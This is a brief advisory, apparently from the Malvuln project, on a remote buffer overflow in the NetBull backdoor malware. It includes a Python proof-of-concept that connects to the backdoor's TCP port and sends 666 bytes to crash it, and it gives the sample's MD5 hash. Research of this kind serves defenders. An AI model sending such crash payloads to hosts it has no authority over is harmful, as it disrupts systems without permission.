Backdoor.Win32.NetBull.11.b Remote Buffer Overflow



Backdoor.Win32.NetBull.11.b malware suffers from a remote buffer overflow vulnerability.

Exploit/PoC:

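from socket import socket, AF_INET, SOCK_STREAM

MALWARE_HOST = "x.x.x.x"  # address of the infected host (elided in the original)
PORT = 23456              # TCP port the PoC connects to

def doit():
    # Open a TCP connection to the backdoor
    s = socket(AF_INET, SOCK_STREAM)
    s.connect((MALWARE_HOST, PORT))

    # 666-byte payload; sent as bytes, which Python 3 sockets require
    PACKOLA = b"A" * 666
    s.send(PACKOLA)
    s.close()

    print("Backdoor.Win32.NetBull.11.b / Remote Buffer Overflow")
    print("MD5: 0e0fc966862971c29edd4dcaa0ba8e86")
    print("By Malvuln")

if __name__ == "__main__":
    doit()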